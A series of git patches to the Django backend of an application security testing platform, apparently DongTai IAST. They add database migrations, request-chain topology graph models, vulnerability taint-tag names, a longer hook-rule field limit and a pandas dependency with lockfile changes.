file mode 100644 index 000000000..537e6c12f --- /dev/null +++ b/dongtai_common/migrations/0019_assetv2global_iast_asset__is_focu_31e975_idx.py @@ -0,0 +1,18 @@ +# Generated by Django 3.2.20 on 2023-08-30 16:10 + +from django.db import migrations, models + + +class Migration(migrations.Migration): + dependencies = [ + ("dongtai_common", "0018_auto_20230830_1105"), + ] + + operations = [ + migrations.AddIndex( + model_name="assetv2global", + index=models.Index( + fields=["is_focus", "vul_count", "aql", "level", "language_id"], name="iast_asset__is_focu_31e975_idx" + ), + ), + ] diff --git a/dongtai_common/models/assetv2.py b/dongtai_common/models/assetv2.py index 8a63a6621..3e523b212 100644 --- a/dongtai_common/models/assetv2.py +++ b/dongtai_common/models/assetv2.py @@ -80,6 +80,7 @@ class AssetV2Global(models.Model): class Meta: managed = get_managed() db_table = "iast_asset_v2_global" + indexes = [models.Index(fields=("is_focus", "vul_count", "aql", "level", "language_id"))] def get_vul_count_groupby_level(self): return [ From 904d6200dec2423d43413703203e36f1623bd95b Mon Sep 17 00:00:00 2001 From: bidaya0 Date: Fri, 1 Sep 2023 14:18:37 +0800 Subject: [PATCH 048/114] feat: add custom tag --- dongtai_conf/settings.py | 24 ++++++++++++++++++++++++ 1 file changed, 24 insertions(+) diff --git a/dongtai_conf/settings.py b/dongtai_conf/settings.py index 837aed996..28159e59f 100644 --- a/dongtai_conf/settings.py +++ b/dongtai_conf/settings.py @@ -655,6 +655,30 @@ def safe_execute(default, exception, function, *args): "ldap-decoded", "http-token-limited-chars", "numeric-limited-chars", + "custom-encoded-cmd-injection", + "custom-decoded-cmd-injection", + "custom-encoded-jnd-injection", + "custom-decoded-jnd-injection", + "custom-encoded-hql-injection", + "custom-decoded-hql-injection", + "custom-encoded-nosql-injection", + "custom-decoded-nosql-injection", + "custom-encoded-smtp-injection", + "custom-decoded-smtp-injection", + "custom-encoded-xxe", + "custom-decoded-xxe", + "custom-encoded-el-injection", + "custom-decoded-el-injection", + "custom-encoded-reflection-injection", + "custom-decoded-reflection-injection", + "custom-encoded-ssrf", + "custom-decoded-ssrf", + "custom-encoded-path-traversal", + "custom-decoded-path-traversal", + "custom-encoded-file-write", + "custom-encoded-file-write", + "custom-encoded-redos", + "custom-decoded-redos", ] DEFAULT_TAINT_VALUE_RANGE_COMMANDS = [ "KEEP", From 248f1b3c28bba0d35653e42c8230a3e52d7fd85a Mon Sep 17 00:00:00 2001 From: bidaya0 Date: Fri, 1 Sep 2023 15:39:33 +0800 Subject: [PATCH 049/114] feat: change hook strategy length limit. --- dongtai_web/views/engine_hook_rule_add.py | 2 +- dongtai_web/views/engine_hook_rule_modify.py | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/dongtai_web/views/engine_hook_rule_add.py b/dongtai_web/views/engine_hook_rule_add.py index 4333e9ff7..ec37855e6 100644 --- a/dongtai_web/views/engine_hook_rule_add.py +++ b/dongtai_web/views/engine_hook_rule_add.py @@ -28,7 +28,7 @@ class _HookRuleAddBodyargsSerializer(serializers.Serializer): language_id = serializers.IntegerField(help_text=_("The id of language.")) rule_value = serializers.CharField( help_text=_("The value of strategy"), - max_length=255, + max_length=2000, allow_blank=True, ) rule_source = serializers.CharField( diff --git a/dongtai_web/views/engine_hook_rule_modify.py b/dongtai_web/views/engine_hook_rule_modify.py index 5fe9c299d..ffef599ae 100644 --- a/dongtai_web/views/engine_hook_rule_modify.py +++ b/dongtai_web/views/engine_hook_rule_modify.py @@ -32,7 +32,7 @@ class _EngineHookRuleModifySerializer(serializers.Serializer): rule_type_id = serializers.IntegerField(help_text=_("The id of hook rule type.")) rule_value = serializers.CharField( help_text=_("The value of strategy"), - max_length=255, + max_length=2000, allow_blank=True, ) rule_source = serializers.CharField( From 214028d90b6bb859fe4b6efb2d8e5f7cb3ec0560 Mon Sep 17 00:00:00 2001 From: bidaya0 Date: Fri, 1 Sep 2023 16:35:03 +0800 Subject: [PATCH 050/114] add project topo api. --- dongtai_common/models/request_chains.py | 131 ++++++++++++++++++++++++ 1 file changed, 131 insertions(+) diff --git a/dongtai_common/models/request_chains.py b/dongtai_common/models/request_chains.py index 7b0985d35..a931b9fa3 100644 --- a/dongtai_common/models/request_chains.py +++ b/dongtai_common/models/request_chains.py @@ -12,6 +12,7 @@ from dongtai_common.models.agent import IastAgent from dongtai_common.models.agent_method_pool import MethodPool from dongtai_common.models.project import IastProject +from dongtai_common.models.project_version import IastProjectVersion from dongtai_common.utils.db import get_timestamp from dongtai_common.utils.settings import get_managed @@ -58,3 +59,133 @@ class IastAgentRequestChainsVulContext(models.Model): class Meta: managed = get_managed() db_table = "iast_request_chains_vul_context" + + +class IastAgentRequestChainsTopoGraph(models.Model): + start_project = models.ForeignKey( + IastProject, + models.DO_NOTHING, + blank=True, + default=-1, + db_constraint=False, + ) + start_project_version = models.ForeignKey( + IastProjectVersion, + models.DO_NOTHING, + blank=True, + default=-1, + db_constraint=False, + ) + graph_hash = models.CharField( + max_length=255, + blank=True, + unique=True, + ) + dot_string = models.TextField() + max_depth = models.IntegerField() + + class Meta: + managed = get_managed() + db_table = "iast_request_chains_topo_graph" + + +class IastAgentRequestChainsTopoGraphVec(models.Model): + graph_hash = models.ForeignKey( + IastAgentRequestChainsTopoGraph, + max_length=255, + blank=True, + to_field="graph_hash", + on_delete=models.CASCADE, + db_constraint=False, + ) + level_id = models.IntegerField() + source_project_version = models.ForeignKey( + IastProjectVersion, + models.DO_NOTHING, + blank=True, + default=-1, + db_constraint=False, + related_name="source_project_version", + ) + target_project_version = models.ForeignKey( + IastProjectVersion, + models.DO_NOTHING, + blank=True, + default=-1, + db_constraint=False, + related_name="target_project_version", + ) + source_project = models.ForeignKey( + IastProject, + models.DO_NOTHING, + blank=True, + default=-1, + db_constraint=False, + related_name="source_project", + ) + target_project = models.ForeignKey( + IastProject, + models.DO_NOTHING, + blank=True, + default=-1, + db_constraint=False, + related_name="target_project", + ) + source_node_tag = models.CharField( + max_length=255, + blank=True, + ) + target_node_tag = models.CharField( + max_length=255, + blank=True, + ) + + class Meta: + managed = get_managed() + db_table = "iast_request_chains_topo_graph_vecs" + + +class IastAgentRequestChainsTotalProjectVersionGraphVec(models.Model): + source_project_version = models.ForeignKey( + IastProjectVersion, + models.DO_NOTHING, + blank=True, + default=-1, + db_constraint=False, + related_name="total_source_project_version", + ) + target_project_version = models.ForeignKey( + IastProjectVersion, + models.DO_NOTHING, + blank=True, + default=-1, + db_constraint=False, + related_name="total_target_project_version", + ) + + class Meta: + managed = get_managed() + db_table = "iast_request_chains_total_project_version_graph_vec" + + +class IastAgentRequestChainsTotalProjectGraphVec(models.Model): + source_project = models.ForeignKey( + IastProject, + models.DO_NOTHING, + blank=True, + default=-1, + db_constraint=False, + related_name="total_source_project", + ) + target_project = models.ForeignKey( + IastProject, + models.DO_NOTHING, + blank=True, + default=-1, + db_constraint=False, + related_name="total_target_project", + ) + + class Meta: + managed = get_managed() + db_table = "iast_request_chains_total_project_graph_vec" From db9f808733b8a719aa5e242842124c6cfb9051d6 Mon Sep 17 00:00:00 2001 From: bidaya0 Date: Fri, 1 Sep 2023 16:37:49 +0800 Subject: [PATCH 051/114] feat: add new topo graph model. --- ...phvec_iastagentrequestchainstotalprojec.py | 71 +++++++++++++++++++ 1 file changed, 71 insertions(+) create mode 100644 dongtai_common/migrations/0020_iastagentrequestchainstopograph_iastagentrequestchainstopographvec_iastagentrequestchainstotalprojec.py diff --git a/dongtai_common/migrations/0020_iastagentrequestchainstopograph_iastagentrequestchainstopographvec_iastagentrequestchainstotalprojec.py b/dongtai_common/migrations/0020_iastagentrequestchainstopograph_iastagentrequestchainstopographvec_iastagentrequestchainstotalprojec.py new file mode 100644 index 000000000..f2f10e110 --- /dev/null +++ b/dongtai_common/migrations/0020_iastagentrequestchainstopograph_iastagentrequestchainstopographvec_iastagentrequestchainstotalprojec.py @@ -0,0 +1,71 @@ +# Generated by Django 3.2.20 on 2023-09-01 16:37 + +from django.db import migrations, models +import django.db.models.deletion + + +class Migration(migrations.Migration): + + dependencies = [ + ('dongtai_common', '0019_assetv2global_iast_asset__is_focu_31e975_idx'), + ] + + operations = [ + migrations.CreateModel( + name='IastAgentRequestChainsTopoGraph', + fields=[ + ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')), + ('graph_hash', models.CharField(blank=True, max_length=255, unique=True)), + ('dot_string', models.TextField()), + ('max_depth', models.IntegerField()), + ('start_project', models.ForeignKey(blank=True, db_constraint=False, default=-1, on_delete=django.db.models.deletion.DO_NOTHING, to='dongtai_common.iastproject')), + ('start_project_version', models.ForeignKey(blank=True, db_constraint=False, default=-1, on_delete=django.db.models.deletion.DO_NOTHING, to='dongtai_common.iastprojectversion')), + ], + options={ + 'db_table': 'iast_request_chains_topo_graph', + 'managed': True, + }, + ), + migrations.CreateModel( + name='IastAgentRequestChainsTotalProjectVersionGraphVec', + fields=[ + ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')), + ('source_project_version', models.ForeignKey(blank=True, db_constraint=False, default=-1, on_delete=django.db.models.deletion.DO_NOTHING, related_name='total_source_project_version', to='dongtai_common.iastprojectversion')), + ('target_project_version', models.ForeignKey(blank=True, db_constraint=False, default=-1, on_delete=django.db.models.deletion.DO_NOTHING, related_name='total_target_project_version', to='dongtai_common.iastprojectversion')), + ], + options={ + 'db_table': 'iast_request_chains_total_project_version_graph_vec', + 'managed': True, + }, + ), + migrations.CreateModel( + name='IastAgentRequestChainsTotalProjectGraphVec', + fields=[ + ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')), + ('source_project', models.ForeignKey(blank=True, db_constraint=False, default=-1, on_delete=django.db.models.deletion.DO_NOTHING, related_name='total_source_project', to='dongtai_common.iastproject')), + ('target_project', models.ForeignKey(blank=True, db_constraint=False, default=-1, on_delete=django.db.models.deletion.DO_NOTHING, related_name='total_target_project', to='dongtai_common.iastproject')), + ], + options={ + 'db_table': 'iast_request_chains_total_project_graph_vec', + 'managed': True, + }, + ), + migrations.CreateModel( + name='IastAgentRequestChainsTopoGraphVec', + fields=[ + ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')), + ('level_id', models.IntegerField()), + ('source_node_tag', models.CharField(blank=True, max_length=255)), + ('target_node_tag', models.CharField(blank=True, max_length=255)), + ('graph_hash', models.ForeignKey(blank=True, db_constraint=False, max_length=255, on_delete=django.db.models.deletion.CASCADE, to='dongtai_common.iastagentrequestchainstopograph', to_field='graph_hash')), + ('source_project', models.ForeignKey(blank=True, db_constraint=False, default=-1, on_delete=django.db.models.deletion.DO_NOTHING, related_name='source_project', to='dongtai_common.iastproject')), + ('source_project_version', models.ForeignKey(blank=True, db_constraint=False, default=-1, on_delete=django.db.models.deletion.DO_NOTHING, related_name='source_project_version', to='dongtai_common.iastprojectversion')), + ('target_project', models.ForeignKey(blank=True, db_constraint=False, default=-1, on_delete=django.db.models.deletion.DO_NOTHING, related_name='target_project', to='dongtai_common.iastproject')), + ('target_project_version', models.ForeignKey(blank=True, db_constraint=False, default=-1, on_delete=django.db.models.deletion.DO_NOTHING, related_name='target_project_version', to='dongtai_common.iastprojectversion')), + ], + options={ + 'db_table': 'iast_request_chains_topo_graph_vecs', + 'managed': True, + }, + ), + ] From 6336aeb28ccee53e27ec2b287bde537f67f2f65e Mon Sep 17 00:00:00 2001 From: bidaya0 Date: Fri, 1 Sep 2023 16:41:14 +0800 Subject: [PATCH 052/114] feat: add new topo graph model. --- dongtai_common/models/request_chains.py | 2 ++ 1 file changed, 2 insertions(+) diff --git a/dongtai_common/models/request_chains.py b/dongtai_common/models/request_chains.py index a931b9fa3..fc2ffda43 100644 --- a/dongtai_common/models/request_chains.py +++ b/dongtai_common/models/request_chains.py @@ -166,6 +166,7 @@ class IastAgentRequestChainsTotalProjectVersionGraphVec(models.Model): class Meta: managed = get_managed() db_table = "iast_request_chains_total_project_version_graph_vec" + unique_together = (("source_project_version", "target_project_version"),) class IastAgentRequestChainsTotalProjectGraphVec(models.Model): @@ -189,3 +190,4 @@ class IastAgentRequestChainsTotalProjectGraphVec(models.Model): class Meta: managed = get_managed() db_table = "iast_request_chains_total_project_graph_vec" + unique_together = (("source_project", "target_project"),) From 8ed0badf6bd3d7c9b164f0114a77374446c33f45 Mon Sep 17 00:00:00 2001 From: bidaya0 Date: Fri, 1 Sep 2023 17:08:44 +0800 Subject: [PATCH 053/114] feat: add new topo graph model. --- ...phvec_iastagentrequestchainstotalprojec.py | 71 ------------------- 1 file changed, 71 deletions(-) delete mode 100644 dongtai_common/migrations/0020_iastagentrequestchainstopograph_iastagentrequestchainstopographvec_iastagentrequestchainstotalprojec.py diff --git a/dongtai_common/migrations/0020_iastagentrequestchainstopograph_iastagentrequestchainstopographvec_iastagentrequestchainstotalprojec.py b/dongtai_common/migrations/0020_iastagentrequestchainstopograph_iastagentrequestchainstopographvec_iastagentrequestchainstotalprojec.py deleted file mode 100644 index f2f10e110..000000000 --- a/dongtai_common/migrations/0020_iastagentrequestchainstopograph_iastagentrequestchainstopographvec_iastagentrequestchainstotalprojec.py +++ /dev/null @@ -1,71 +0,0 @@ -# Generated by Django 3.2.20 on 2023-09-01 16:37 - -from django.db import migrations, models -import django.db.models.deletion - - -class Migration(migrations.Migration): - - dependencies = [ - ('dongtai_common', '0019_assetv2global_iast_asset__is_focu_31e975_idx'), - ] - - operations = [ - migrations.CreateModel( - name='IastAgentRequestChainsTopoGraph', - fields=[ - ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')), - ('graph_hash', models.CharField(blank=True, max_length=255, unique=True)), - ('dot_string', models.TextField()), - ('max_depth', models.IntegerField()), - ('start_project', models.ForeignKey(blank=True, db_constraint=False, default=-1, on_delete=django.db.models.deletion.DO_NOTHING, to='dongtai_common.iastproject')), - ('start_project_version', models.ForeignKey(blank=True, db_constraint=False, default=-1, on_delete=django.db.models.deletion.DO_NOTHING, to='dongtai_common.iastprojectversion')), - ], - options={ - 'db_table': 'iast_request_chains_topo_graph', - 'managed': True, - }, - ), - migrations.CreateModel( - name='IastAgentRequestChainsTotalProjectVersionGraphVec', - fields=[ - ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')), - ('source_project_version', models.ForeignKey(blank=True, db_constraint=False, default=-1, on_delete=django.db.models.deletion.DO_NOTHING, related_name='total_source_project_version', to='dongtai_common.iastprojectversion')), - ('target_project_version', models.ForeignKey(blank=True, db_constraint=False, default=-1, on_delete=django.db.models.deletion.DO_NOTHING, related_name='total_target_project_version', to='dongtai_common.iastprojectversion')), - ], - options={ - 'db_table': 'iast_request_chains_total_project_version_graph_vec', - 'managed': True, - }, - ), - migrations.CreateModel( - name='IastAgentRequestChainsTotalProjectGraphVec', - fields=[ - ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')), - ('source_project', models.ForeignKey(blank=True, db_constraint=False, default=-1, on_delete=django.db.models.deletion.DO_NOTHING, related_name='total_source_project', to='dongtai_common.iastproject')), - ('target_project', models.ForeignKey(blank=True, db_constraint=False, default=-1, on_delete=django.db.models.deletion.DO_NOTHING, related_name='total_target_project', to='dongtai_common.iastproject')), - ], - options={ - 'db_table': 'iast_request_chains_total_project_graph_vec', - 'managed': True, - }, - ), - migrations.CreateModel( - name='IastAgentRequestChainsTopoGraphVec', - fields=[ - ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')), - ('level_id', models.IntegerField()), - ('source_node_tag', models.CharField(blank=True, max_length=255)), - ('target_node_tag', models.CharField(blank=True, max_length=255)), - ('graph_hash', models.ForeignKey(blank=True, db_constraint=False, max_length=255, on_delete=django.db.models.deletion.CASCADE, to='dongtai_common.iastagentrequestchainstopograph', to_field='graph_hash')), - ('source_project', models.ForeignKey(blank=True, db_constraint=False, default=-1, on_delete=django.db.models.deletion.DO_NOTHING, related_name='source_project', to='dongtai_common.iastproject')), - ('source_project_version', models.ForeignKey(blank=True, db_constraint=False, default=-1, on_delete=django.db.models.deletion.DO_NOTHING, related_name='source_project_version', to='dongtai_common.iastprojectversion')), - ('target_project', models.ForeignKey(blank=True, db_constraint=False, default=-1, on_delete=django.db.models.deletion.DO_NOTHING, related_name='target_project', to='dongtai_common.iastproject')), - ('target_project_version', models.ForeignKey(blank=True, db_constraint=False, default=-1, on_delete=django.db.models.deletion.DO_NOTHING, related_name='target_project_version', to='dongtai_common.iastprojectversion')), - ], - options={ - 'db_table': 'iast_request_chains_topo_graph_vecs', - 'managed': True, - }, - ), - ] From 6ec843be0a1fdd154b285a11a654d8b34235986f Mon Sep 17 00:00:00 2001 From: bidaya0 Date: Fri, 1 Sep 2023 17:09:11 +0800 Subject: [PATCH 054/114] feat: add new topo graph model. --- ...phvec_iastagentrequestchainstotalprojec.py | 180 ++++++++++++++++++ 1 file changed, 180 insertions(+) create mode 100644 dongtai_common/migrations/0020_iastagentrequestchainstopograph_iastagentrequestchainstopographvec_iastagentrequestchainstotalprojec.py diff --git a/dongtai_common/migrations/0020_iastagentrequestchainstopograph_iastagentrequestchainstopographvec_iastagentrequestchainstotalprojec.py b/dongtai_common/migrations/0020_iastagentrequestchainstopograph_iastagentrequestchainstopographvec_iastagentrequestchainstotalprojec.py new file mode 100644 index 000000000..0efa83b09 --- /dev/null +++ b/dongtai_common/migrations/0020_iastagentrequestchainstopograph_iastagentrequestchainstopographvec_iastagentrequestchainstotalprojec.py @@ -0,0 +1,180 @@ +# Generated by Django 3.2.20 on 2023-09-01 16:41 + +from django.db import migrations, models +import django.db.models.deletion + + +class Migration(migrations.Migration): + dependencies = [ + ("dongtai_common", "0019_assetv2global_iast_asset__is_focu_31e975_idx"), + ] + + operations = [ + migrations.CreateModel( + name="IastAgentRequestChainsTopoGraph", + fields=[ + ("id", models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name="ID")), + ("graph_hash", models.CharField(blank=True, max_length=255, unique=True)), + ("dot_string", models.TextField()), + ("max_depth", models.IntegerField()), + ( + "start_project", + models.ForeignKey( + blank=True, + db_constraint=False, + default=-1, + on_delete=django.db.models.deletion.DO_NOTHING, + to="dongtai_common.iastproject", + ), + ), + ( + "start_project_version", + models.ForeignKey( + blank=True, + db_constraint=False, + default=-1, + on_delete=django.db.models.deletion.DO_NOTHING, + to="dongtai_common.iastprojectversion", + ), + ), + ], + options={ + "db_table": "iast_request_chains_topo_graph", + "managed": True, + }, + ), + migrations.CreateModel( + name="IastAgentRequestChainsTopoGraphVec", + fields=[ + ("id", models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name="ID")), + ("level_id", models.IntegerField()), + ("source_node_tag", models.CharField(blank=True, max_length=255)), + ("target_node_tag", models.CharField(blank=True, max_length=255)), + ( + "graph_hash", + models.ForeignKey( + blank=True, + db_constraint=False, + max_length=255, + on_delete=django.db.models.deletion.CASCADE, + to="dongtai_common.iastagentrequestchainstopograph", + to_field="graph_hash", + ), + ), + ( + "source_project", + models.ForeignKey( + blank=True, + db_constraint=False, + default=-1, + on_delete=django.db.models.deletion.DO_NOTHING, + related_name="source_project", + to="dongtai_common.iastproject", + ), + ), + ( + "source_project_version", + models.ForeignKey( + blank=True, + db_constraint=False, + default=-1, + on_delete=django.db.models.deletion.DO_NOTHING, + related_name="source_project_version", + to="dongtai_common.iastprojectversion", + ), + ), + ( + "target_project", + models.ForeignKey( + blank=True, + db_constraint=False, + default=-1, + on_delete=django.db.models.deletion.DO_NOTHING, + related_name="target_project", + to="dongtai_common.iastproject", + ), + ), + ( + "target_project_version", + models.ForeignKey( + blank=True, + db_constraint=False, + default=-1, + on_delete=django.db.models.deletion.DO_NOTHING, + related_name="target_project_version", + to="dongtai_common.iastprojectversion", + ), + ), + ], + options={ + "db_table": "iast_request_chains_topo_graph_vecs", + "managed": True, + }, + ), + migrations.CreateModel( + name="IastAgentRequestChainsTotalProjectVersionGraphVec", + fields=[ + ("id", models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name="ID")), + ( + "source_project_version", + models.ForeignKey( + blank=True, + db_constraint=False, + default=-1, + on_delete=django.db.models.deletion.DO_NOTHING, + related_name="total_source_project_version", + to="dongtai_common.iastprojectversion", + ), + ), + ( + "target_project_version", + models.ForeignKey( + blank=True, + db_constraint=False, + default=-1, + on_delete=django.db.models.deletion.DO_NOTHING, + related_name="total_target_project_version", + to="dongtai_common.iastprojectversion", + ), + ), + ], + options={ + "db_table": "iast_request_chains_total_project_version_graph_vec", + "managed": True, + "unique_together": {("source_project_version", "target_project_version")}, + }, + ), + migrations.CreateModel( + name="IastAgentRequestChainsTotalProjectGraphVec", + fields=[ + ("id", models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name="ID")), + ( + "source_project", + models.ForeignKey( + blank=True, + db_constraint=False, + default=-1, + on_delete=django.db.models.deletion.DO_NOTHING, + related_name="total_source_project", + to="dongtai_common.iastproject", + ), + ), + ( + "target_project", + models.ForeignKey( + blank=True, + db_constraint=False, + default=-1, + on_delete=django.db.models.deletion.DO_NOTHING, + related_name="total_target_project", + to="dongtai_common.iastproject", + ), + ), + ], + options={ + "db_table": "iast_request_chains_total_project_graph_vec", + "managed": True, + "unique_together": {("source_project", "target_project")}, + }, + ), + ] From a51103b18e29e2c1d4349e605f1f0988a1a874c7 Mon Sep 17 00:00:00 2001 From: bidaya0 Date: Fri, 1 Sep 2023 17:12:20 +0800 Subject: [PATCH 055/114] feat: add new topo graph model. --- ...questchainstopographvec_iastagentrequestchainstotalprojec.py | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/dongtai_common/migrations/0020_iastagentrequestchainstopograph_iastagentrequestchainstopographvec_iastagentrequestchainstotalprojec.py b/dongtai_common/migrations/0020_iastagentrequestchainstopograph_iastagentrequestchainstopographvec_iastagentrequestchainstotalprojec.py index 0efa83b09..51fa6e73d 100644 --- a/dongtai_common/migrations/0020_iastagentrequestchainstopograph_iastagentrequestchainstopographvec_iastagentrequestchainstotalprojec.py +++ b/dongtai_common/migrations/0020_iastagentrequestchainstopograph_iastagentrequestchainstopographvec_iastagentrequestchainstotalprojec.py @@ -1,7 +1,7 @@ # Generated by Django 3.2.20 on 2023-09-01 16:41 -from django.db import migrations, models import django.db.models.deletion +from django.db import migrations, models class Migration(migrations.Migration): From 3b168c4bec8ed4529984cd18a44f65068ef77e47 Mon Sep 17 00:00:00 2001 From: bidaya0 Date: Fri, 1 Sep 2023 18:38:29 +0800 Subject: [PATCH 056/114] fix: memory reduce. --- dongtai_common/engine/vul_engine.py | 3 +-- 1 file changed, 1 insertion(+), 2 deletions(-) diff --git a/dongtai_common/engine/vul_engine.py b/dongtai_common/engine/vul_engine.py index 514717857..8382b990f 100644 --- a/dongtai_common/engine/vul_engine.py +++ b/dongtai_common/engine/vul_engine.py @@ -281,8 +281,7 @@ def vul_filter(self): @staticmethod def copy_method(method_detail, sink=False, source=False, propagator=False, filter=False): - vul_method_detail = copy.deepcopy(method_detail) - vul_method_detail["originClassName"] = vul_method_detail["originClassName"] + vul_method_detail = method_detail # todo 根据类型进行拼接 if source: vul_method_detail["tag"] = "source" From e1f40234cd5c591bf6e60dfcba6b2136cf1c059b Mon Sep 17 00:00:00 2001 From: st1020 Date: Mon, 4 Sep 2023 10:56:17 +0800 Subject: [PATCH 057/114] deps: add pandas dependance --- Pipfile | 1 + Pipfile.lock | 126 ++++++++++++++++++++++++---- requirements.txt | 211 ++++++++++++++++++++++++----------------------- 3 files changed, 216 insertions(+), 122 deletions(-) diff --git a/Pipfile b/Pipfile index 16bf232e6..75132e917 100644 --- a/Pipfile +++ b/Pipfile @@ -91,6 +91,7 @@ django-health-check = "==3.17.0" django-prometheus = "==2.3.1" django-add-default-value = "==0.10.0" networkx = {extras = ["all"], version = "*"} +pandas = "~=2.1.0" [dev-packages] diff --git a/Pipfile.lock b/Pipfile.lock index 72f554e15..1d75b0e12 100644 --- a/Pipfile.lock +++ b/Pipfile.lock @@ -1,7 +1,7 @@ { "_meta": { "hash": { - "sha256": "6d3dc051e911275cbd5f9e72dcaa45bb784c95dd385f70fc2617a5dcb85cc0c2" + "sha256": "a6fdf2b597cdada21055c164b389c0ed3ca3d8d752f37d61e24f06757bca5f1d" }, "pipfile-spec": 6, "requires": { @@ -49,6 +49,7 @@ "sha256:9e0ce3aa93a819ba5b45120216b23878cf6e8525eb3848653452b4192b92afed" ], "index": "pypi", + "markers": "python_version >= '3.7'", "version": "==3.7.2" }, "async-timeout": { @@ -89,15 +90,17 @@ "sha256:a50b4323f9579cfe22fcf5531fbd40b567d4d74c1adce06aeb5c95fce2a6fb40" ], "index": "pypi", + "markers": "python_version >= '3.7'", "version": "==1.24.59" }, "boto3-stubs": { "hashes": [ - "sha256:68c9c5b88982aea2023225815cf4aef8ec8deeecce9b6225d2d71cfad2247a10", - "sha256:7fca135b829888dea640b13d1ba508e3b2c0c31135ca8b07a11dda0247067d37" + "sha256:76079a82f199087319762c931f13506e02129132e80257dab0888d3da7dc11c7", + "sha256:bd1d1cbdcbf18902a090d4a746cdecef2a7ebe31cf9a474bbe407d57eaa79a6a" ], "index": "pypi", - "version": "==1.28.35" + "markers": "python_version >= '3.7'", + "version": "==1.28.40" }, "botocore": { "hashes": [ @@ -105,15 +108,17 @@ "sha256:c8fac203a391cc2e4b682877bfce70e723e33c529b35b399a1d574605fbeb1af" ], "index": "pypi", + "markers": "python_version >= '3.7'", "version": "==1.27.91" }, "botocore-stubs": { "hashes": [ - "sha256:19cf4813f717ebf112eeb8908c61385bce44163d5e827cc3debe5a6b63f4ef04", - "sha256:96858fb8bcf1f4413629b1f9484588e5d6bf3f9c20a37b2e760edf94f4b64c00" + "sha256:2001a253daf4ae2e171e6137b9982a00a7fbfc7a53449a16856dc049e7cd5214", + "sha256:aab534d7e7949cd543bc9b2fadc1a36712033cb00e6f31e2475eefe8486d19ae" ], "index": "pypi", - "version": "==1.31.35" + "markers": "python_version >= '3.7' and python_version < '4.0'", + "version": "==1.31.40" }, "celery": { "hashes": [ @@ -121,6 +126,7 @@ "sha256:3afa81e7c6393097a4079badc11117ac20a1bf145c92ae5f1cc3ed24c2b1f165" ], "index": "pypi", + "markers": "python_version >= '3.7'", "version": "==5.3.0rc1" }, "celery-singleton": { @@ -129,6 +135,7 @@ "sha256:76b30a1bbe31d42030924b3eecfcaae2ab3ab99bf43e607cd46437f012434420" ], "index": "pypi", + "markers": "python_version >= '3.6' and python_version < '4.0'", "version": "==0.3.1" }, "certifi": { @@ -137,6 +144,7 @@ "sha256:92d6037539857d8206b8f6ae472e8b77db8058fec5937a1ef3f54304089edbb9" ], "index": "pypi", + "markers": "python_version >= '3.6'", "version": "==2023.7.22" }, "cffi": { @@ -215,6 +223,7 @@ "sha256:e1cf59446890a00105fe7b7912492ea04b6e6f06d4b742b2c788469e34c82970" ], "index": "pypi", + "markers": "python_version >= '3.7'", "version": "==5.2.0" }, "charset-normalizer": { @@ -365,6 +374,7 @@ "sha256:d0d651aa754ef58d75cec6edfbd21259d93810b73f6ec246436a21b7841908de" ], "index": "pypi", + "markers": "python_version >= '3.7'", "version": "==41.0.3" }, "dataclasses-json": { @@ -373,6 +383,7 @@ "sha256:d82896a94c992ffaf689cd1fafc180164e2abdd415b8f94a7f78586af5886236" ], "index": "pypi", + "markers": "python_version < '3.13' and python_version >= '3.7'", "version": "==0.5.14" }, "ddt": { @@ -405,6 +416,7 @@ "sha256:dec2a116787b8e14962014bf78e120bba454135108e1af9e9b91ade7b2964c40" ], "index": "pypi", + "markers": "python_version >= '3.6'", "version": "==3.2.20" }, "django-add-default-value": { @@ -429,6 +441,7 @@ "sha256:f9749c6410fe738278bc2b6ef17f05195bc7b251693c035752d8257026af024f" ], "index": "pypi", + "markers": "python_version >= '3.8'", "version": "==4.2.0" }, "django-cprofile-middleware": { @@ -452,6 +465,7 @@ "sha256:d12d8e0fc6d3eb26641e553e5d53b191eb8cec611427d4bdce0becb1f7c172b5" ], "index": "pypi", + "markers": "python_version >= '3.7'", "version": "==23.2" }, "django-health-check": { @@ -460,6 +474,7 @@ "sha256:d1b8671e79d1de6e3dd1a9c69566222b0bfcfacca8b90511a4407b2d0d3d2778" ], "index": "pypi", + "markers": "python_version >= '3.8'", "version": "==3.17.0" }, "django-import-export": { @@ -468,6 +483,7 @@ "sha256:cf6f3dabdd4f32dcb26e25c7ddcba7aee3168b55d380b0da79f0349afa17c011" ], "index": "pypi", + "markers": "python_version >= '3.5'", "version": "==2.5.0" }, "django-mock-queries": { @@ -475,7 +491,7 @@ "sha256:7ee3f34752e8131479924ea6952fe37c4106cc18e6fc3e5e9b28b333eeda10b3" ], "index": "pypi", - "version": "==v2.1.7" + "version": "==2.1.7" }, "django-modeltranslation": { "hashes": [ @@ -505,6 +521,7 @@ "sha256:8a99e5582c79f894168f5865c52bd921213253b7fd64d16733ae4591564465de" ], "index": "pypi", + "markers": "python_version >= '3.6'", "version": "==5.2.0" }, "django-rest-framework-proxy": { @@ -520,6 +537,7 @@ "sha256:771f88a24f6166bdb3a944769fa09e24c317ea1b8f5ee8040d121d30b4395219" ], "index": "pypi", + "markers": "python_version >= '3.6'", "version": "==0.4.3" }, "django-silk": { @@ -528,6 +546,7 @@ "sha256:50552f06d9306d06517fbeab9a2c74856355e06304f03ed16b6dd353f7c77e7a" ], "index": "pypi", + "markers": "python_version >= '3.7'", "version": "==5.0.3" }, "django-simple-captcha": { @@ -546,7 +565,7 @@ "sha256:0bbf9eb172c5b06eccff2d704c7c3906e4a2c6146df8c32ee9f3a51e29265581", "sha256:25010658acac0ce4a69211b55dd719fd16dbfe54fcfe5c878d0c8db07bdd5482" ], - "index": "pypi", + "markers": "python_version >= '3.7'", "version": 